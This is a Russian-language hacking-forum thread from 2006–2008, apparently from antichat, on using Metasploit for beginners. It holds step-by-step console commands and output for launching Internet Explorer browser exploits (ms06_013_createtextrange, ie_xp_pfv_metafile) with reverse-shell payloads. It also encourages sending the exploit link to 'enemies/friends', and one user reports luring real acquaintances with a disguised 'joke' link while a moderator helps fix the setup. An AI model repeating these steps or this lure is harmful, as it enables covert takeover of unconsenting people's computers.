Авторские статьи Metasploit Framework для ламеров

Discussion in 'Статьи' started by -=lebed=-, 11 Jul 2006.

?
  1. Да, пользуюсь и доволен.

    51.2%
  2. Нет, он меня не устраивает, не нужен и т. п.

    14.8%
  3. А что это?

    34.0%
  1. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    у меня вобще при вводе info generic/shell_bind_tcp Выводит туеву кучу ошибок
     
  2. romasjan

    romasjan New Member

    Joined:
    6 Feb 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    запускаю нет кат который шел с метасплойтом 3.1 появляется окно в нем CMD line: и чего мне тут прописывать
     
  3. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    ip(который был указан в параметре RHOST) port(который был указан в параметре LPORT)
     
  4. romasjan

    romasjan New Member

    Joined:
    6 Feb 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    ну это и я пойму ) ! я имеи ввиду какой командой
    эта вся беда прописывается
     
  5. Amoura

    Amoura Elder - Старейшина

    Joined:
    23 Jan 2008
    Messages:
    237
    Likes Received:
    148
    Reputations:
    46
    Итак, коротко о Metasploit fгаmеwork 3.1:
    Напишу только про консольный вариант. Запускаем Metasploit 3 GUI. После этого клацаем Window -> Console (Ctrl+O). И так переда нами открыта консоль, а именно:
    Code:
                    _                  _       _ _
                   | |                | |     (_) |
     _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
    | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
    | | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
    |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                                | |
                                |_|
    
    
           =[ msf v3.1-release
    + -- --=[ 262 exploits - 117 payloads
    + -- --=[ 17 encoders - 6 nops
           =[ 46 aux
    Для просмотра основных команд, наберите в консоли:

    msf > help


    Command Description
    ------- -----------
    ?-------------------Help menu
    back--------------Move back from the current context
    banner-----------Display an awesome metasploit banner
    cd-----------------Change the current working directory
    exit---------------Exit the console
    help--------------Help menu
    info---------------Displays information about one or more module
    irb----------------Drop into irb scripting mode
    jobs--------------Displays and manages jobs
    load--------------Load a framework plugin
    loadpath--------Searches for and loads modules from a path
    quit--------------Exit the console
    route------------Route traffic through a session
    save-------------Saves the active datastores
    search-----------Searches module names and descriptions
    sessions--------Dump session listings and display information about sessions
    set---------------Sets a variable to a value
    setg-------------Sets a global variable to a value
    show------------Displays modules of a given type, or all modules
    sleep------------Do nothing for the specified number of seconds
    unload----------Unload a framework plugin
    unset-----------Unsets one or more variables
    unsetg---------Unsets one or more global variables
    use--------------Selects a module by name
    version---------Show the console library version number
    exploit -------- Run exploit


    Затем, пишем в консоли show, в консоли появиться список всего что есть в папке, а именно:
    Code:
    Encoders--------------------Кодирующие устройства
    NOP Generators-----------Генераторы только для указанных целей
    Exploits----------------------Эксплоиты
    Payloads---------------------Начинка
    Auxiliary----------------------Вспомогательный
    // заранее извините за такой перевод, переводил online-переводчиком.

    Распрастранённые ошибки расматривать не буду, так как о них описано в первом посте: http://forum.antichat.ru/showpost.php?p=173560&postcount=1

    Продолжим, находим интересующий нас сплоит, предположим, это будет:
    windows/browser/ms06_013_createtextrange --------------Internet Explorer createTextRange() Code Execution
    Пишем в консоли:

    msf > info windows/browser/ms06_013_createtextrange

    Code:
           Name: Internet Explorer createTextRange() Code Execution
        Version: 4645
       Platform: Windows
     Privileged: No
        License: Metasploit Framework License
    
    Provided by:
      Faithless <[email protected]>
      Darkeagle <unl0ck.net>
      hdm <[email protected]>
      justfriends4n0w <[email protected]>
      anonymous <[email protected]>
    
    Available targets:
      Id  Name                                                 
      --  ----                                                 
      0   Internet Explorer 6 - (6.0.3790.0 - Windows XP SP2)  
      1   Internet Explorer 7 - (7.0.5229.0 - Windows XP SP2)  
    
    Basic options:
      Name     Current Setting  Required  Description                                          
      ----     ---------------  --------  -----------                                          
      SRVHOST  0.0.0.0          yes       The local host to listen on.                         
      SRVPORT  8080             yes       The local port to listen on.                         
      URIPATH                   no        The URI to use for this exploit (default is random) 
    Нас интересует строчка Basic options:
    SRVHOST - Локальный IP адрес сервера
    SRVPORT - его порт (8080 - по умолчанию)

    Практическое использование:
    Эксплоит: windows/browser/ms06_013_createtextrange, начинка windows/shell_reverse_tcp

    msf > use windows/browser/ms06_013_createtextrange
    msf exploit(ms06_013_createtextrange) > set SRVHOST ххх.ххх.ххх.ххх
    SRVHOST => ххх.ххх.ххх.ххх
    msf exploit(ms06_013_createtextrange) > set PAYLOAD windows/shell_reverse_tcp
    PAYLOAD => windows/shell_reverse_tcp
    msf exploit(ms06_013_createtextrange) > exploit

    [*] Started reverse handler

    [*] Using URL: http://ххх.ххх.ххх.ххх:8080/X6boTVOxklj

    [*] Server started.


    После этого, впариваем врагам/друзьям эту ссылку..

    После того как он заходит по ссылке, в консоли мы увидим следующее:

    [*] Sending exploit to ххх.ххх.ххх.ххх:2810...

    Все, эксплоит работает.

    p.s. сильно не пинайте
     
    1 person likes this.
  6. romasjan

    romasjan New Member

    Joined:
    6 Feb 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    незнаю я например не вижу смысла описывать один и тот же баг снова! помойму метасплоиту можно найти и интересней применение по взлому! Поэтому оч жду статью от -=lebed=-
     
  7. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    33
    Likes Received:
    32
    Reputations:
    1
    Используйте лудше пока 3 метасплоит в веб режиме )Намного проще...Можна выбрать какой будем использовать експлолит настроить начинку...все довольно просто особенно после того как прочитать статьи...и после просмотра видео в котором наглядно показывают как пользоватся експлолитом.
     
    1 person likes this.
  8. romasjan

    romasjan New Member

    Joined:
    6 Feb 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Просто надо научится пользоватся 3.1 и все будет оК . да хоть 3 и проще но мне например больше нравится 3.1 . Если кто то опишет как им пользоваться по подробнее то всем всё станет ясно и понятно
     
  9. azbest777

    azbest777 New Member

    Joined:
    12 Aug 2007
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    может кто выложит поподробнеее инфо о PAYLOAD для VNC inject. Хочу деда добыть:).Какие установки и что к чему. Кто знает инфо о других нагрузках...?
     
  10. ultimatum

    ultimatum Elder - Старейшина

    Joined:
    28 Apr 2007
    Messages:
    142
    Likes Received:
    65
    Reputations:
    -13
    посмотри здесь

    http://www.metasploit.com/projects/Framework/docs/userguide/node52.html

    и здесь

    http://www.linickx.com/archives/219/how-to-exploit-ms06-040
     
  11. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Тут рассмотрены: https://forum.antichat.ru/showthread.php?t=38434
     
    1 person likes this.
  12. VAMPIRE

    VAMPIRE Banned

    Joined:
    2 Oct 2005
    Messages:
    23
    Likes Received:
    2
    Reputations:
    0
    главное знание про сплоитах, а так все легко ))
     
  13. romasjan

    romasjan New Member

    Joined:
    6 Feb 2008
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    где можно найти инфу про 3.1
     
  14. ZET36

    ZET36 Elder - Старейшина

    Joined:
    8 Oct 2007
    Messages:
    250
    Likes Received:
    49
    Reputations:
    0
    ды в 3.1 всё почти тоже самое что и в 3.0
    ( правдо 3.0 непользовался но читал статью об использовании 3.0 и она подходит к 3.1)

    запуск консоли:
    Пуск>Все программы>Metaslpoit 3>Metaslpoit 3 GUI
    (вверху закладка windows>console)

    Веб интерфэйс:
    Пуск>Все программы>Metaslpoit 3>Metaslpoit 3 Web

    а так всё как в 3.0 только сплоитов и шеллов побольше

    вот наиболее подходящщая статья для новичков в примерах
    (наверно она есть на ачате но в лом искать ссылку)
    http://www.nulled.ws/showthread.php?t=12613

    правдо та комбинация сплоита и шелла которая там описывается уже не актуальна но понять как и что к чему можно

    скачать 3.1 можно сдесь http://www.metasploit.com/framework/
     
    #134 ZET36, 12 Mar 2008
    Last edited: 12 Mar 2008
    1 person likes this.
  15. valikiev

    valikiev New Member

    Joined:
    9 Mar 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, у меня такая проблема: скидываю ссылку своим знакомым в асе типа "Маша, смотри какой прикол: http://10.0.0.1:8080/ (прим. вообще-то тут должен быть внешний ip)" прошу их зайти по ней, они заходят, но.....у меня ничего срабатывает, у них пишется "сервер недоступен", когда я захожу по ней, получается сам на себя, то у меня всё работает, делал всё так как написано ниже.....где то в глубине души я понимаю что что-то делаю не так, но что??? У меня модемное соединение.....использовал Metasploit Framework v 2.6...

    msf > use ie_xp_pfv_metafile
    msf ie_xp_pfv_metafile > set LHOST 10.0.0.1
    LHOST -> 10.0.0.1
    msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
    PAYLOAD -> win32_reverse
    msf ie_xp_pfv_metafile(win32_reverse) >msf ie_xp_pfv_metafile(win32_reverse) > exploit
    [*] Starting Reverse Handler.
    [*] Waiting for connections to http://10.0.0.1:8080/

    ссылку надо давать на твой внешний АЙПИ (уже не раз обсуждалось) если твой сервер у жертвы недоступен через интернет, то вполне возможно ты за NAT или блокирует файрвол внешние подключения. Главное условие успеха - чтоб твой сервер метасплоита был доступен жертве через интернет. P.S. Давно пора юзать уже версию 3.1 -=lebed=-
     
    #135 valikiev, 14 Mar 2008
    Last edited by a moderator: 14 Mar 2008
  16. valikiev

    valikiev New Member

    Joined:
    9 Mar 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Нет, ну айпи я даю свой, а не такой как в примере, дело наверное в файере, попробую без него..
     
  17. valikiev

    valikiev New Member

    Joined:
    9 Mar 2008
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Привет всем, у меня не запускается Metasploit Framework 3.1...запускаю Metasploit 3 GUI на секунду появляется окно cmd и пропадает, дальше ничего не происходит...не работает ничего, кроме VNC, может кто сталкивался с этим и знает что делать?
     
  18. lll6

    lll6 Elder - Старейшина

    Joined:
    29 Feb 2008
    Messages:
    83
    Likes Received:
    15
    Reputations:
    5
    То же самое, помогите пожалуйста
     
  19. lll6

    lll6 Elder - Старейшина

    Joined:
    29 Feb 2008
    Messages:
    83
    Likes Received:
    15
    Reputations:
    5
    Ну хоть кто-то знает же
    Попробуй поставить последний NET.Framework от мелкомягких, возможно это решит проблему. -=lebed=-
     
    #139 lll6, 13 Apr 2008
    Last edited by a moderator: 13 Apr 2008
  20. qweasd

    qweasd New Member

    Joined:
    14 Aug 2007
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Вот у мя вопрос а какое имя у сплойта (use ie_xp_pfv_metafile) в 3.1 версии! с таким именем не нашел!!